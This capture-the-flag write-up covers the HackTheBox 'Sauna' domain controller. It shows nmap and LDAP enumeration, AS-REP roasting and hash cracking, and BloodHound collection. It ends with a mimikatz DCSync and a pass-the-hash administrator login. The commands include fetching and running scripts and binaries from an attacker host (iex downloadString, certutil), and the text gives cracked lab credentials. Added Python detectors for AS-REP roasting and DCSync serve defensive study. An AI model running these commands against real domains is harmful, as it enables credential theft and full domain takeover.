As always, I start with an nmap scan, after which I carry out further investigation based on the results.
Nmap scan report for 10.10.10.175
Host is up (0.14s latency).
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-29 21:24:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/29%Time=5EF9F97D%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m31s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-06-29T21:26:48
|_  start_date: N/A

NSE: Script Post-scanning.
As can be seen in the results above, a number of LDAP ports are open, so my next command was as follows:
nmap -v -n -sV --script="ldap*" 10.10.10.175
The result was as follows:
Nmap scan report for 10.10.10.175
Host is up (0.080s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-30 19:22:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
| ldap-brute:
|   root:<empty> => Valid credentials
|   admin:<empty> => Valid credentials
|   administrator:<empty> => Valid credentials
|   webadmin:<empty> => Valid credentials
|   sysadmin:<empty> => Valid credentials
|   netadmin:<empty> => Valid credentials
|   guest:<empty> => Valid credentials
|   user:<empty> => Valid credentials
|   web:<empty> => Valid credentials
|_  test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
|       ldapServiceName: EGOTISTICAL-BANK.LOCAL:sauna$@EGOTISTICAL-BANK.LOCAL
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       [supportedLDAPPolicies, supportedControl and supportedCapabilities lists omitted]
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|       serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|       namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
|       namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|       namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|       namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|       namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|       isSynchronized: TRUE
|       highestCommittedUSN: 53469
|       dsServiceName: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|       dnsHostName: SAUNA.EGOTISTICAL-BANK.LOCAL
|       defaultNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
|       currentTime: 20200630192519.0Z
|_      configurationNamingContext: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
| ldap-search:
|   Context: DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: DC=EGOTISTICAL-BANK,DC=LOCAL
|         objectClass: top
|         objectClass: domain
|         objectClass: domainDNS
|         distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
|         instanceType: 5
|         whenCreated: 2020/01/23 05:44:25 UTC
|         whenChanged: 2020/06/29 05:00:54 UTC
|         subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         uSNCreated: 4099
|         dSASignature: [binary value omitted]
|         uSNChanged: 53269
|         name: EGOTISTICAL-BANK
|         objectGUID: 504e6ec-c122-a143-93c0-cf487f83363
|         replUpToDateVector: [binary value omitted]
|         creationTime: 132378804547498566
|         forceLogoff: -9223372036854775808
|         lockoutDuration: -18000000000
|         lockOutObservationWindow: -18000000000
|         lockoutThreshold: 0
|         maxPwdAge: -36288000000000
|         minPwdAge: -864000000000
|         minPwdLength: 7
|         modifiedCountAtLastProm: 0
|         nextRid: 1000
|         pwdProperties: 1
|         pwdHistoryLength: 24
|         objectSid: 1-5-21-2966785786-3096785034-1186376766
|         serverState: 1
|         uASCompat: 1
|         modifiedCount: 1
|         auditingPolicy: \x00\x01
|         nTMixedDomain: 0
|         rIDManagerReference: CN=RID Manager$,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|         fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         systemFlags: -1946157056
|         wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
|         objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         isCriticalSystemObject: TRUE
|         gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL;0]
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
|         otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
|         masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         ms-DS-MachineAccountQuota: 10
|         msDS-Behavior-Version: 7
|         msDS-PerUserTrustQuota: 1
|         msDS-AllUsersTrustQuota: 1000
|         msDS-PerUserTrustTombstonesQuota: 10
|         msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         msDS-NcType: 0
|         msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
|         dc: EGOTISTICAL-BANK
|     dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
|_    dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
| ldap-brute, ldap-rootdse, ldap-search: essentially the same results as for 389/tcp above (duplicate output omitted)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/30%Time=5EFB2E7A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Okay, good: we have managed to gather some information, such as the fact that we are dealing with a domain controller. (The ldap-brute lines reporting valid credentials for every username with an empty password are a false positive: the directory accepts an empty password as an anonymous bind, which does not confirm that those accounts exist.)

My next step was to find out which users existed and which did not with the help of GetNPUsers.py, but for that I need a list of usernames. That is where the web server came in handy: it had an about page listing names.

Using the image above, I made a list of usernames, as shown below:
hsmith fsmith Fergus Smith Fergus.s Fergus.S F Smith F smith f Smith f smith fsmith Shaun Coins S.Coins s.Coins Shaun.C Shaun.c s.coins scoins Scoins SCoins s.Coins S.COins Hugo Bear H Bear H bear h bear h Bear hbear hBear HBear H.B h.b H.b h.B Steven Kerb skerb Skerb SKerb S.Kerb S.kerb S Kerb S kerb s.kerb S.kerb S.Kerb F smith f smith f.smith F.smith F Smith F.Smith Hugo smith H Smith H smith Hugo s Hugo S H S h s H s h S Hugo Smith H.Smith H.smith h.Smith h.smith Hugo.s Hugo.S hugo.s hugo.S Johnson johnson Watson watson Admin admin James Doe james doe James.D James.d james.D james.d James D james d james D Jenny Joy Jenny j Jenny J jenny J jenny j j.Joy J.Joy j.jenny J.Jenny J.D j.doe j.Doe J.doe J.Doe john John Wat wat
After making a list of usernames, I ran the following command:
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/Documents/htb/sauna/users.txt -format hashcat -outputfile ashesh.asreproast
As can be seen in the image below, there was indeed one username that worked.

After looking at the output file ‘ashesh.asreproast’ we had the following hash:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b99a2265c2ae859eccd73b8781b0356a$4e721d4bad1820b599654ef8bc367bfbaef3c79f39cf9354e2f4d32349036f98317d098e67840945727c37d19fc8a7d876f997305245132847b5968781fd46567b2885c61d0cff1f69500469bb33fc35333dbb2d1dddc60677daa3370f68088c3356b31580628fbadca5bb1872f505f6fc9f26a07adaf11e6dffec9c37071a570a64ce99a1c0416e4880f416a85de3eb5d2fef28fdae8e6f770b129eac2225ea2c72c30405b28a97d113bc7ac5a7d9c3467fa88f6a346cb48ca80673de62147ad40770a56c61da0c149e61f2ddbc1f54875890702a9fc8694c5e8b2492f36209ecdf12ae6bd23a1b8a18c59bb2997b40fece8069e96f4f2ba7b714ce0141e008
The next step was to crack the hash with hashcat; I used the following command for this:
hashcat -m 18200 ashesh.asreproast /usr/share/wordlists/rockyou.txt/rockyou.txt

After a few seconds the hash was cracked and we had found the first set of user credentials, namely fsmith:Thestrokes23. Now that I have a valid account, I will try to log in with evil-winrm. See the following command:
evil-winrm -u fsmith -p 'Thestrokes23' -i 10.10.10.175
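From the defender's side, the GetNPUsers and hashcat steps above leave a clear footprint on the domain controller. The following is an added example (not part of the original write-up) that runs a small detection over constructed Windows Security event 4768 records and splits the hashcat 18200 line into its fields; the event field names are the real EventData names, while the event values, IP addresses, user names and the short sample hash are made up.

```python
"""Spot AS-REP roasting and username enumeration in Windows event 4768 data.

Constructed example: the records below imitate the EventData fields of
Security event 4768 (Kerberos TGT requested) as a DC would log the
GetNPUsers step. Field names follow the real event; values are made up.
"""
from collections import defaultdict

# Constructed 4768 events. PreAuthType "0" means no pre-authentication,
# TicketEncryptionType 0x17 is RC4-HMAC, Status 0x6 is
# KDC_ERR_C_PRINCIPAL_UNKNOWN (the requested user does not exist).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.14.22"},
    {"EventID": 4768, "TargetUserName": "scoins", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x6", "IpAddress": "10.10.14.22"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x6", "IpAddress": "10.10.14.22"},
    {"EventID": 4768, "TargetUserName": "hsmith", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.10.50"},
    # Same user after pre-authentication was re-enabled: no longer roastable.
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.10.50"},
    # A TGS request (4769) is not an AS exchange and is ignored.
    {"EventID": 4769, "TargetUserName": "fsmith", "PreAuthType": "-",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.10.50"},
]

# Constructed hashcat-mode-18200 line with a shortened ciphertext.
SAMPLE_HASH = ("$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:"
               "0123456789abcdef0123456789abcdef$deadbeefcafef00d")


def is_asrep_roast(ev):
    """A successful TGT request for an account without pre-authentication.
    The reply carries material encrypted with the user's key, which is what
    the $krb5asrep$ line holds; RC4 (0x17) is what hashcat 18200 cracks."""
    return (ev.get("EventID") == 4768
            and ev.get("PreAuthType") == "0"
            and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType", "").lower() == "0x17")


def find_asrep_roasts(events):
    """(source IP, account) pairs that were roastable. Accounts listed here
    need 'Do not require Kerberos preauthentication' cleared."""
    return sorted({(ev["IpAddress"], ev["TargetUserName"])
                   for ev in events if is_asrep_roast(ev)})


def find_user_enumeration(events, threshold=5):
    """Sources that triggered KDC_ERR_C_PRINCIPAL_UNKNOWN for many different
    names: the footprint of feeding a username list to GetNPUsers."""
    unknown = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == 4768 and ev.get("Status") == "0x6":
            unknown[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(names) for ip, names in unknown.items()
            if len(names) >= threshold}


def parse_asrep_hash(line):
    """Split a hashcat 18200 line into its fields:
    $krb5asrep$<etype>$<user>@<realm>:<32 hex checksum>$<hex ciphertext>."""
    parts = line.split("$")
    if len(parts) != 5 or parts[1] != "krb5asrep":
        raise ValueError("not a $krb5asrep$ line")
    principal, checksum = parts[3].split(":", 1)
    user, realm = principal.split("@", 1)
    return {"etype": int(parts[2]), "user": user, "realm": realm,
            "checksum": checksum, "ciphertext": parts[4]}


if __name__ == "__main__":
    print("roastable:", find_asrep_roasts(SAMPLE_EVENTS))
    print("enumeration:", find_user_enumeration(SAMPLE_EVENTS, threshold=2))
    print("hash fields:", parse_asrep_hash(SAMPLE_HASH))
```

In a real environment the IpAddress field is usually prefixed with "::ffff:" and the threshold should be tuned to the volume of genuine typos.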

The next step was to run WinPEAS.exe on the system to get more information about it and about what possibilities there are to look at for a possible privilege escalation. In the end I found another set of user credentials.

The next step was to see what exactly this new user can do on our target; for this I used SharpHound.ps1, which I ran with the following command:
iex(new-object net.webclient).downloadString('http://10.10.14.22/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Domain EGOTISTICAL-BANK.LOCAL -LDAPUser fsmith -LDAPPass Thestrokes23
After which I downloaded the result to my own machine with the following command:
download 20200630151351_BloodHound.zip /root/Documents/htb/sauna/bloodhound.zip
Then I opened this file in BloodHound; before you can run BloodHound you first have to run the following command:
neo4j console
After that you can run the ‘bloodhound’ command, which starts the program, and you can drag the zip file into BloodHound. Then go to queries at the top left and click on “Find Principals with DCSync Rights”.

As you can see, with the new account we found thanks to WinPEAS we can perform a DCSync attack.
The next step was to log in again with evil-winrm using this new information.

The next step is to transfer mimikatz.exe to our target so that we can use this program. I did this with the following command:
certutil -urlcache -split -f "http://IP/mimikatz.exe" mimikatz.exe
Then I ran the following command:
.\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
After which we see the following result:

With this information we can now log in as administrator with the following command:
evil-winrm -u administrator -H "d9485863c1e9e05851aa40cbb4ab9dff" -i 10.10.10.175
That was the machine, thanks for reading!
DCSync attack?
DCSync is a command in mimikatz that an attacker can use to imitate the behaviour of a domain controller. Put simply, it allows the attacker to pose as a domain controller in order to request password data from other domain controllers.
How does this work?
- An attacker takes over an account that has the rights to perform domain replication.
- Once the attacker has the required rights, they can run the dcsync command in mimikatz to request password data.
- Once the attacker has obtained the password data, they can use it to forge a Kerberos ticket. With this the attacker can gain access to all resources connected to the Active Directory.
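The replication rights described above are also what makes DCSync detectable: exercising them on the domain object is logged by the domain controller as Security event 4662, and only domain controllers (plus a few known replication accounts) should ever be the subject. The following is an added example, not part of the original write-up, that runs that check over constructed 4662 records; the EventData field names and the three replication-right GUIDs are real, while the account name "svc_backup", the unrelated GUID and the event values are made up.

```python
"""Flag DCSync from Windows Security event 4662 (operation on an AD object).

Constructed example. A DCSync request exercises the replication
control-access rights on the domain object; the DC logs that as 4662 with
AccessMask 0x100 and the rights' GUIDs in Properties. Only domain
controllers and known replication accounts should appear as the subject.
"""
import re

# Control-access right GUIDs used by directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Accounts allowed to replicate: the DC machine accounts of this domain.
DOMAIN_CONTROLLERS = {"SAUNA$"}

# Constructed 4662 events in the shape of their EventData fields.
REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_EVENTS = [
    # Normal replication traffic from the DC itself.
    {"EventID": 4662, "SubjectUserName": "SAUNA$",
     "SubjectDomainName": "EGOTISTICAL-BANK", "AccessMask": "0x100",
     "Properties": REPL_PROPS},
    # A plain account pulling secrets: what the mimikatz lsadump::dcsync
    # step looks like from the DC's side (account name is made up).
    {"EventID": 4662, "SubjectUserName": "svc_backup",
     "SubjectDomainName": "EGOTISTICAL-BANK", "AccessMask": "0x100",
     "Properties": REPL_PROPS},
    # An unrelated control-access right (constructed GUID) exercised by a user.
    {"EventID": 4662, "SubjectUserName": "fsmith",
     "SubjectDomainName": "EGOTISTICAL-BANK", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{11111111-2222-3333-4444-555555555555}"},
    # A logon event: wrong ID, ignored.
    {"EventID": 4624, "SubjectUserName": "fsmith",
     "SubjectDomainName": "EGOTISTICAL-BANK"},
]


def replication_rights_used(properties):
    """Names of the replication rights whose GUIDs occur in Properties."""
    return sorted({REPLICATION_RIGHTS[g.lower()]
                   for g in GUID_RE.findall(properties)
                   if g.lower() in REPLICATION_RIGHTS})


def detect_dcsync(events, domain_controllers):
    """Alerts for replication rights exercised by anything that is not a DC.
    Get-Changes-All is the right that returns password hashes, so its
    presence makes the alert high severity."""
    allowed = {dc.upper() for dc in domain_controllers}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask", "").lower() != "0x100":
            continue
        rights = replication_rights_used(ev.get("Properties", ""))
        if not rights or ev["SubjectUserName"].upper() in allowed:
            continue
        severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
        alerts.append({"subject": ev["SubjectUserName"],
                       "domain": ev.get("SubjectDomainName", ""),
                       "rights": rights, "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, DOMAIN_CONTROLLERS):
        print(alert)
```

The same allowlist idea applies to prevention: the BloodHound query “Find Principals with DCSync Rights” used above shows a defender which non-DC principals hold these rights, so they can be removed before an attacker finds them.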